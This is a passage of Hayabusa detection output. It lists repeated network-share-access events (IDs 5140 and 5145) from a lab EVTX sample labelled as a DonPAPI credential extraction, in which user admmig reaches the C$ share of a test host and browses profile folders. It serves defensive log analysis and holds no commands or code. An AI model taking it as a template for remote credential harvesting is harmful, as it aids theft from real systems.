0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.407 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.549 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.564 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.580 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.596 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.596 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.611 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.627 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 